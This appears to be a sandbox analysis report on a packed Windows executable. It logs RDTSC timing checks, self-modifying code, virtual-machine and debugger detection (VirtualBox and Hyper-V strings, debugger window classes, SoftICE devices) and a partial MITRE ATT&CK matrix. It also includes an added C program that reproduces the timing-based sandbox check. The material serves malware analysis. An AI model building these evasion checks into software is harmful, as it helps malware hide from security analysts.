Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D92A3 second address: 3D92E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F27492B5213h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jbe 00007F27492B5206h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F27492B5217h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4923 second address: 3E492A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E492A second address: 3E4934 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F27492B5212h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E4934 second address: 3E497A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2749204C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e js 00007F2749204C26h 0x00000014 jmp 00007F2749204C39h 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2749204C2Ch 0x00000021 jmp 00007F2749204C2Ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9FE5 second address: 3E9FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F27492B5206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9FEF second address: 3E9FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9FF3 second address: 3E9FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9FF9 second address: 3EA00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2749204C2Bh 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA00D second address: 3EA013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9B72 second address: 3E9B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E9B78 second address: 3E9B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F27492B5206h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3E9B91 second address: 3E9B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3E9CED second address: 3E9CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F27492B5206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3E9CF7 second address: 3E9CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3EF6DC second address: 3EF6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jbe 00007F27492B5206h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3F8D1A second address: 3F8D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3F8B86 second address: 3F8BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F27492B5218h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3F8BA3 second address: 3F8BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F2749204C26h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3FBE82 second address: 3FBE99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3FBE99 second address: 3FBEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3FBEA3 second address: 3FBECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F27492B5206h 0x0000000c je 00007F27492B5206h 0x00000012 jmp 00007F27492B5217h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3FBECE second address: 3FBED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 401D4F second address: 401D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5219h 0x00000007 je 00007F27492B5206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 401D72 second address: 401D7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F2749204C26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 401D7E second address: 401D8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 401D8A second address: 401D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 402733 second address: 402737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 402737 second address: 402743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 402743 second address: 40276B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F27492B5214h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F27492B520Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 40276B second address: 402783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 402783 second address: 40278E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 40278E second address: 4027A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4027A2 second address: 4027A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4027A6 second address: 4027AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 40316F second address: 403174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 403174 second address: 403185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C2Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 403185 second address: 40318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4063D6 second address: 4063DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4063DC second address: 4063E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4063E0 second address: 406409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C30h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F2749204C37h 0x00000011 jmp 00007F2749204C2Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 405FEF second address: 405FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 405FF4 second address: 406003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2749204C26h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 406003 second address: 40600D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F27492B5206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 41723B second address: 417254 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jns 00007F2749204C2Eh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 417254 second address: 41725A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4170BE second address: 4170C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4170C2 second address: 4170C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4170C6 second address: 4170CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4170CE second address: 4170D8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F27492B520Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4170D8 second address: 4170E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4170E0 second address: 4170F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F27492B5233h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4140CE second address: 4140EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F2749204C28h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push ecx 0x00000013 jnc 00007F2749204C26h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 423696 second address: 42369D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43B4D9 second address: 43B4FE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2749204C28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F2749204C37h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43A44D second address: 43A451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 30BFBA second address: 30BFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 30BFBE second address: 30BFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 30BFC2 second address: 30BFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F2749204C26h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 30BFE4 second address: 30BFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43AD7B second address: 43AD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43AD7F second address: 43AD9E instructions: 0x00000000 rdtsc 0x00000002 js 00007F27492B5206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jp 00007F27492B5206h 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F27492B520Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43AD9E second address: 43ADAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2749204C26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43ADAA second address: 43ADB4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F27492B5206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43ADB4 second address: 43ADC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F2749204C26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43DE4A second address: 43DE5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43E477 second address: 43E47F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43E47F second address: 43E4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov dx, 61EAh 0x0000000d push dword ptr [ebp+122D26B8h] 0x00000013 mov edx, eax 0x00000015 call 00007F27492B5209h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F27492B5214h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43E4B3 second address: 43E4B8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43E4B8 second address: 43E4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jo 00007F27492B521Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F27492B5206h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 43E4CE second address: 43E509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edi 0x00000012 jmp 00007F2749204C37h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push edi 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop edi 0x0000001f pushad 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 441187 second address: 44119D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B520Dh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 44119D second address: 4411A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
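The entries above are the protector's timing check: two rdtsc reads separated by filler that does no real work (push/pop of the same register, pushad/popad, conditional jumps that fall through), after which the difference between the two counter values is compared against a threshold. A delta far above the cost of a handful of instructions means rdtsc was trapped by a hypervisor or the code was being single-stepped. Joe Sandbox's interceptor logs every pair, which is why the addresses chain (the second address of one entry is the first address of the next). The C program below is an added illustration written for this page, not code from the sample or from Joe Sandbox: it reproduces the measurement on whatever host it is compiled on. The 1000-tick threshold and the volatile increment standing in for the packer's filler are assumptions; on non-x86 hosts a monotonic clock replaces rdtsc so the file still builds.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 199309L
#endif
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* Read the processor time-stamp counter. RDTSC exists only on x86; elsewhere a
   monotonic nanosecond clock stands in (assumption) so the program still runs. */
static uint64_t read_tsc(void)
{
#if defined(__x86_64__) || defined(__i386__)
    uint32_t lo, hi;
    __asm__ volatile("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* Smallest delta between two back-to-back TSC reads over `samples` attempts.
   The packer separates its two reads with junk (push/pop, pushad/popad, jumps
   that are never taken); a volatile increment plays that part here.
   Taking the minimum discards interrupts and preemption, which inflate single
   measurements even on bare metal. Returns UINT64_MAX when samples == 0. */
uint64_t min_tsc_delta(unsigned samples)
{
    uint64_t best = UINT64_MAX;
    volatile uint32_t junk = 0;
    for (unsigned i = 0; i < samples; i++) {
        uint64_t t0 = read_tsc();
        junk += 1;                       /* the filler between the two reads */
        uint64_t t1 = read_tsc();
        if (t1 >= t0 && t1 - t0 < best)  /* skip pairs where the counter went backwards */
            best = t1 - t0;
    }
    return best;
}

/* The decision the check makes: a delta far above the cost of the filler
   means RDTSC caused a VM exit or emulation, or the code was single-stepped.
   The threshold is an assumption; real protectors pick their own value. */
int tsc_delta_suggests_instrumentation(uint64_t delta, uint64_t threshold)
{
    return delta > threshold;
}

int main(void)
{
    uint64_t d = min_tsc_delta(256);
    printf("min rdtsc delta: %llu ticks -> %s\n", (unsigned long long)d,
           tsc_delta_suggests_instrumentation(d, 1000) ? "instrumented?" : "looks native");
    return 0;
}
```

A sandbox that wants to pass this check either lets rdtsc execute natively (Intel VMX exposes RDTSC exiting as an optional control) and adjusts the guest view with TSC offsetting, or, as Joe Sandbox does here, intercepts the pairs and records them as an evasion attempt.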
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 19C8B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 19C9A0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 37757F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 3615EF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 3DE4AD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe TID: 5436 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 396 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1742300907.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742300907.0000000000B69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1742300907.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B98000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBn
Source: file.exe, 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017DF70 LdrInitializeThunk, 0_2_0017DF70
Source: file.exe, 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: EProgram Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (numbers in parentheses are the signature counts shown in the matrix; techniques without a count are the matrix's placeholder entries with no matching signature):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); At; Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
